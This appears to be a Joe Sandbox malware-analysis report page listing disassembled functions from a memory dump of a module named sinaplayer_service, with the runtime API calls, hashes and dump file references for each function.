                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2959964966-0
                                                                                                                                                                                                    • Opcode ID: 1aef1269b1c0a54d386925daaf71a234f4d92a335fa26cd820396f6e47cdd2a9
                                                                                                                                                                                                    • Instruction ID: 55ecd36766ee15368980a65f428b3bb97f3ed3266bc2f4aa8eec2671c860ef6c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1aef1269b1c0a54d386925daaf71a234f4d92a335fa26cd820396f6e47cdd2a9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1B411579018707AAF3414B69C44473AFBA4FF0B364B14835AD9B58B2D0E724E461DBD0
                                                                                                                                                                                                    Function 6D0B1980 Relevance: 12.1, APIs: 8, Instructions: 127COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • wcsncmp.MSVCR120 ref: 6D0B1991
                                                                                                                                                                                                    • _wcscspn.LIBCMT(?,Function_00021268), ref: 6D0B19BD
                                                                                                                                                                                                    • wcsncpy_s.MSVCR120(?,00000083,?,00000000), ref: 6D0B19F5
                                                                                                                                                                                                    • _wcspbrk.LIBCMT(00000000,6D0B1AA4,00000000,00000000,00000000), ref: 6D0B1A61
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _wcscspn_wcspbrkwcsncmpwcsncpy_s
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4220790964-0
                                                                                                                                                                                                    • Opcode ID: 8ad309421dd0dae8b444a4e7ab205ac10b7a7f73097043c5480c2dc4f115b6f5
                                                                                                                                                                                                    • Instruction ID: 42ea67be7fa97d380e44575e6cd8060cfeece9df8ed8f57b49cdb1212b06ff6a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8ad309421dd0dae8b444a4e7ab205ac10b7a7f73097043c5480c2dc4f115b6f5
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9D418331D0D2569AFB259F64DC40BEAB3B4FF1A304F15449AD908E7284E772A980CF92
                                                                                                                                                                                                    Function 6D10BB8D Relevance: 12.1, APIs: 8, Instructions: 122stringCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D10BBAC
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D10BBB6
                                                                                                                                                                                                    • strcpy_s.MSVCR120(?,00000000,?,?), ref: 6D10BBDE
                                                                                                                                                                                                    • _ismbblead_l.MSVCR120(?,?,?), ref: 6D10BC1E
                                                                                                                                                                                                    • _errno.MSVCR120(?), ref: 6D10BC3B
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?), ref: 6D10BC45
                                                                                                                                                                                                    • _ismbblead_l.MSVCR120(?,?,?), ref: 6D10BC60
                                                                                                                                                                                                    • _errno.MSVCR120(?), ref: 6D10BC87
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_invalid_parameter_noinfo_ismbblead_l$strcpy_s
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3622607720-0
                                                                                                                                                                                                    • Opcode ID: 85bf035d633759d88bb0443cdc004d8021ee442f166485e5e65b0d74e8587b79
                                                                                                                                                                                                    • Instruction ID: b49ef7036a1bbaf4a4331da12d83f18f03855d54209eee10279f789e349d30c2
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 85bf035d633759d88bb0443cdc004d8021ee442f166485e5e65b0d74e8587b79
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 70418A3160C20BAFDB05EF28DA90AAE7B78EF55714F114169E9409F288DFB1C981C791
                                                                                                                                                                                                    Function 6D094C47 Relevance: 12.1, APIs: 8, Instructions: 101COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _fileno.MSVCR120(?,?,?), ref: 6D094C90
                                                                                                                                                                                                    • _read.MSVCR120(00000000,?,?), ref: 6D094C97
                                                                                                                                                                                                    • _fileno.MSVCR120(?), ref: 6D094CBA
                                                                                                                                                                                                    • _fileno.MSVCR120(?), ref: 6D094CCA
                                                                                                                                                                                                    • _fileno.MSVCR120(?), ref: 6D094CDB
                                                                                                                                                                                                    • _fileno.MSVCR120(?,?), ref: 6D094CE6
                                                                                                                                                                                                      • Part of subcall function 6D0958BC: _malloc_crt.MSVCR120(00001000,0]m,?,6D0B13DD,0]m,00000000,00000000,00000000,?,6D0D5D30,00000000,?), ref: 6D0958C6
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0D4FFE
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D0D5009
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _fileno$_errno_invalid_parameter_noinfo_malloc_crt_read
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1828220225-0
                                                                                                                                                                                                    • Opcode ID: fba175331dc037c894bec56e68fbc809d03a3b87f3afa52018a4aadda22211f6
                                                                                                                                                                                                    • Instruction ID: be8754a26fa413d149e7b28a0c120cf4fddad29fe590e48a0c0baef0ce94dc60
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fba175331dc037c894bec56e68fbc809d03a3b87f3afa52018a4aadda22211f6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D931D475418607BAF7014A7AC444779BBE4BF0A338F50A30AE8748E1D0D768E051AB99
                                                                                                                                                                                                    Function 6D0B2ECC Relevance: 12.1, APIs: 8, Instructions: 97COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000001,00000000,00000001,00000002,?,00000000,?), ref: 6D0B2F3A
                                                                                                                                                                                                    • _get_osfhandle.MSVCR120(?,00000000), ref: 6D0B2F40
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 6D0B2F47
                                                                                                                                                                                                    • DuplicateHandle.KERNEL32(00000000), ref: 6D0B2F4A
                                                                                                                                                                                                      • Part of subcall function 6D094DF1: _get_osfhandle.MSVCR120(?,?,?,?,6D094F10,?,6D094F30,00000010), ref: 6D094DFA
                                                                                                                                                                                                      • Part of subcall function 6D094DF1: _get_osfhandle.MSVCR120(?), ref: 6D094E1D
                                                                                                                                                                                                      • Part of subcall function 6D094DF1: CloseHandle.KERNEL32(00000000), ref: 6D094E24
                                                                                                                                                                                                    • _errno.MSVCR120(?), ref: 6D0DF075
                                                                                                                                                                                                    • __doserrno.MSVCR120(?), ref: 6D0DF080
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _get_osfhandle$CurrentHandleProcess$CloseDuplicate__doserrno_errno
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4219055303-0
                                                                                                                                                                                                    • Opcode ID: ffc27bb610f49e99ed73b4fc4f227bdd7be98a01fa50a9068d82d40d6681ec23
                                                                                                                                                                                                    • Instruction ID: 153e7ac0f569b766077a54cab06c79761ae71f05fe72f710e471dd7cd4805427
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ffc27bb610f49e99ed73b4fc4f227bdd7be98a01fa50a9068d82d40d6681ec23
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8131F871918295BFEB119F38D884BAD7FF5EF06314F158299E9648F292CB71D800CB50
                                                                                                                                                                                                    Function 6D15069F Relevance: 12.1, APIs: 8, Instructions: 96COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Dint$__getfpcontrolwordfegetround
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3049488995-0
                                                                                                                                                                                                    • Opcode ID: 77600fbad549342e0cd42d9fdecb4f30e899c42ce8ce918dd996c43f0f5eb897
                                                                                                                                                                                                    • Instruction ID: bfc537e900196c30aa83e8f37d93cc59abf9dc3ecab64f70cc1cee4c433dac51
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 77600fbad549342e0cd42d9fdecb4f30e899c42ce8ce918dd996c43f0f5eb897
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7021B1B6048A1FA6EF008E96F401BFA3768DB447A8F114016FDB8994C8DFB8D2E0C740
                                                                                                                                                                                                    Function 6D0A0C5E Relevance: 12.1, APIs: 8, Instructions: 86COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _lock_file.MSVCR120(?,6D0A0D40,0000000C), ref: 6D0A0C95
                                                                                                                                                                                                      • Part of subcall function 6D094B96: _lock.MSVCR120(?), ref: 6D094BC1
                                                                                                                                                                                                    • _fileno.MSVCR120(?,?,?,6D0A0D40,0000000C), ref: 6D0A0CA5
                                                                                                                                                                                                    • __output_l.LIBCMT ref: 6D0A0D16
                                                                                                                                                                                                    • __ftbuf.LIBCMT ref: 6D0A0D22
                                                                                                                                                                                                    • _errno.MSVCR120(6D0A0D40,0000000C), ref: 6D0D5539
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(6D0A0D40,0000000C), ref: 6D0D5544
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?,?,?,?,?,?,6D0A0D40,0000000C), ref: 6D0D5551
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,?,?,?,?,?,?,?,6D0A0D40,0000000C), ref: 6D0D555C
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo$__ftbuf__output_l_fileno_lock_lock_file
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3923144078-0
                                                                                                                                                                                                    • Opcode ID: b843496a15692c38d07dd9787147f93e9b96d382a8724ee52ac5bab609a52bd8
                                                                                                                                                                                                    • Instruction ID: c78179e32988cf583f10ed9d74c303e0d9d649102759bbb2c2eb0c3bfadaf2ed
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b843496a15692c38d07dd9787147f93e9b96d382a8724ee52ac5bab609a52bd8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3721FBB291C30A9BFB015FF98C8073E35A1AF86378B5A8329F5354F1DAD778D5019611
                                                                                                                                                                                                    Function 6D0A5C41 Relevance: 12.1, APIs: 8, Instructions: 80memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 6D0A5C48
                                                                                                                                                                                                    • ??0_ReentrantBlockingLock@details@Concurrency@@QAE@XZ.MSVCR120(00000014,6D0D23E5,0000000C,6D0A500E,E18D5491,?,00000180,?), ref: 6D0A5C73
                                                                                                                                                                                                      • Part of subcall function 6D0A5C29: __crtInitializeCriticalSectionEx.MSVCR120(?,00000000,00000180,6D0A4ACC,?,?,?,?,?,?,?,?,?,?,6D094938,000000FF), ref: 6D0A5C35
                                                                                                                                                                                                    • ??0_ReentrantBlockingLock@details@Concurrency@@QAE@XZ.MSVCR120(00000014,6D0D23E5,0000000C,6D0A500E,E18D5491,?,00000180,?), ref: 6D0A5CA4
                                                                                                                                                                                                      • Part of subcall function 6D0A6F10: TlsAlloc.KERNEL32 ref: 6D0A6F16
                                                                                                                                                                                                      • Part of subcall function 6D0A5760: Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 6D0A5829
                                                                                                                                                                                                    • Concurrency::details::ResourceManager::DetermineTopology.LIBCMT ref: 6D0A5CC2
                                                                                                                                                                                                      • Part of subcall function 6D0A5A97: ??_U@YAPAXI@Z.MSVCR120(00000000,?,6D0A3A7E,00000000,0000000C,6D0A500E,E18D5491,?,00000180,?), ref: 6D0A5ACF
                                                                                                                                                                                                      • Part of subcall function 6D0A5A97: memset.MSVCR120(00000000,00000000,?,00000000,?,6D0A3A7E,00000000,0000000C,6D0A500E,E18D5491,?,00000180,?), ref: 6D0A5AE0
                                                                                                                                                                                                      • Part of subcall function 6D0A5A97: ??_U@YAPAXI@Z.MSVCR120(00000000,00000000,00000000,?,00000000,?,6D0A3A7E,00000000,0000000C,6D0A500E,E18D5491,?,00000180,?), ref: 6D0A5B05
                                                                                                                                                                                                      • Part of subcall function 6D0A5A97: memset.MSVCR120(00000000,00000000,?,?,?,?,6D0A3A7E,00000000,0000000C,6D0A500E,E18D5491,?,00000180,?), ref: 6D0A5B24
                                                                                                                                                                                                      • Part of subcall function 6D0A5A97: Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 6D0A5B75
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000000,00000014,6D0D23E5,0000000C,6D0A500E,E18D5491,?,00000180,?), ref: 6D0A5CF4
                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00001000,00003000,00000004,00000014,6D0D23E5,0000000C,6D0A500E,E18D5491,?,00000180,?), ref: 6D0D2413
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(6D0948CA,00000001,?,?,?,?,?,?,?,?,?,?,?,?,00000000,6D15BB86), ref: 6D0D2433
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(00000000,6D0AC7FC,6D0948CA,00000001), ref: 6D0D2448
                                                                                                                                                                                                      • Part of subcall function 6D0A3C0B: __crtCreateEventExW.MSVCR120(00000000,00000000,00000000,001F0002), ref: 6D0A3C1B
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Concurrency::details::Manager::ResourceTopology$??0_AllocBlockingCleanupConcurrency@@InformationLock@details@Reentrant__crtmemset$CreateCriticalDetermineEventExceptionH_prolog3InitializeSectionThrowVirtualstd::exception::exception
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3903250442-0
                                                                                                                                                                                                    • Opcode ID: 2ad95c53e027e7a5c3b6007df82dac6700616b503a226f0cbab51424016e1f82
                                                                                                                                                                                                    • Instruction ID: 8a321f48885de2fdfaab436771a200b59a20e41762dbf5f53f431363a51f9fc1
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2ad95c53e027e7a5c3b6007df82dac6700616b503a226f0cbab51424016e1f82
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 753147B0904B46EFEB14DFAAC8807D9FBB0BF08304F55852ED6199BA42C7B4A150CF91
                                                                                                                                                                                                    Function 6D0ABEC4 Relevance: 12.1, APIs: 8, Instructions: 76COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • DecodePointer.KERNEL32(00000000,?,?,?,?,6D0ABE8C,?,6D0ABEA8,0000000C,6D0ACCD6,?,?,6D0ACD0C,6D0D1BD1,?,6D0ACD94), ref: 6D0ABED7
                                                                                                                                                                                                    • DecodePointer.KERNEL32(?,?,?,?,6D0ABE8C,?,6D0ABEA8,0000000C,6D0ACCD6,?,?,6D0ACD0C,6D0D1BD1,?,6D0ACD94,00000000), ref: 6D0ABEE2
                                                                                                                                                                                                    • _msize.MSVCR120(00000000,?,?,?,?,6D0ABE8C,?,6D0ABEA8,0000000C,6D0ACCD6,?,?,6D0ACD0C,6D0D1BD1,?,6D0ACD94), ref: 6D0ABF02
                                                                                                                                                                                                      • Part of subcall function 6D09CA0E: HeapSize.KERNEL32(00000000,00000000,?,6D0ABF07,00000000,?,?,?,?,6D0ABE8C,?,6D0ABEA8,0000000C,6D0ACCD6,?), ref: 6D09CA26
                                                                                                                                                                                                    • EncodePointer.KERNEL32(?,?,?,?,?,6D0ABE8C,?,6D0ABEA8,0000000C,6D0ACCD6,?,?,6D0ACD0C,6D0D1BD1,?,6D0ACD94), ref: 6D0ABF18
                                                                                                                                                                                                    • EncodePointer.KERNEL32(00000000,?,?,?,?,6D0ABE8C,?,6D0ABEA8,0000000C,6D0ACCD6,?,?,6D0ACD0C,6D0D1BD1,?,6D0ACD94), ref: 6D0ABF24
                                                                                                                                                                                                    • _realloc_crt.MSVCR120(00000000,00000800,?,?,?,?,6D0ABE8C,?,6D0ABEA8,0000000C,6D0ACCD6,?,?,6D0ACD0C,6D0D1BD1), ref: 6D0ADBFF
                                                                                                                                                                                                    • EncodePointer.KERNEL32(00000000,?,?,?,?,6D0ABE8C,?,6D0ABEA8,0000000C,6D0ACCD6,?,?,6D0ACD0C,6D0D1BD1,?,6D0ACD94), ref: 6D0ADC15
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Pointer$Encode$Decode$HeapSize_msize_realloc_crt
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 765448609-0
                                                                                                                                                                                                    • Opcode ID: 360950ab14c0627e4300f190567aac110ff443983662528f7cac815d445d865b
                                                                                                                                                                                                    • Instruction ID: ca43853e29eddd8f01d0a95be484a84c00c5501d35988a06b28506e6cdffcede
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 360950ab14c0627e4300f190567aac110ff443983662528f7cac815d445d865b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C621E731514256EFFB119FB9EC84BAA7BFDEB4A3947454526E901C7101FB71EC008BA0
                                                                                                                                                                                                    Function 6D0F85DA Relevance: 12.1, APIs: 8, Instructions: 68COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 6D0F85E1
                                                                                                                                                                                                    • free.MSVCR120(00000000,00000014,6D0E9B1B,00000000,00000000,?,6D0F7B9B,00000001,00000000,?,00000000,6D0E9323,?,6D0E9323,?,6D0F881D), ref: 6D0F8631
                                                                                                                                                                                                    • free.MSVCR120(?,00000014,6D0E9B1B,00000000,00000000,?,6D0F7B9B,00000001,00000000,?,00000000,6D0E9323,?,6D0E9323,?,6D0F881D), ref: 6D0F8638
                                                                                                                                                                                                    • ?__ExceptionPtrDestroy@@YAXPAX@Z.MSVCR120(?,00000014,6D0E9B1B,00000000,00000000,?,6D0F7B9B,00000001,00000000,?,00000000,6D0E9323,?,6D0E9323,?,6D0F881D), ref: 6D0F864C
                                                                                                                                                                                                    • free.MSVCR120(?,00000014,6D0E9B1B,00000000,00000000,?,6D0F7B9B,00000001,00000000,?,00000000,6D0E9323,?,6D0E9323,?,6D0F881D), ref: 6D0F8653
                                                                                                                                                                                                    • ??0exception@std@@QAE@XZ.MSVCR120(00000014,6D0E9B1B,00000000,00000000,?,6D0F7B9B,00000001,00000000,?,00000000,6D0E9323,?,6D0E9323,?,6D0F881D), ref: 6D0F8671
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6D15CE94,00000014,6D0E9B1B,00000000,00000000,?,6D0F7B9B,00000001,00000000,?,00000000,6D0E9323,?,6D0E9323), ref: 6D0F8686
                                                                                                                                                                                                    • ??1event@Concurrency@@QAE@XZ.MSVCR120(00000014,6D0E9B1B,00000000,00000000,?,6D0F7B9B,00000001,00000000,?,00000000,6D0E9323,?,6D0E9323,?,6D0F881D), ref: 6D0F8692
                                                                                                                                                                                                      • Part of subcall function 6D0F8582: __uncaught_exception.MSVCR120(?,?,?,?,6D0E923C,00000001), ref: 6D0F8595
                                                                                                                                                                                                      • Part of subcall function 6D0F8792: ??1_TaskCollection@details@Concurrency@@QAE@XZ.MSVCR120(?,?,?,6D0F861B,00000000,00000014,6D0E9B1B,00000000,00000000,?,6D0F7B9B,00000001,00000000,?,00000000,6D0E9323), ref: 6D0F87BD
                                                                                                                                                                                                      • Part of subcall function 6D0F8792: free.MSVCR120(?,?,?,?,6D0F861B,00000000,00000014,6D0E9B1B,00000000,00000000,?,6D0F7B9B,00000001,00000000,?,00000000), ref: 6D0F87C3
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
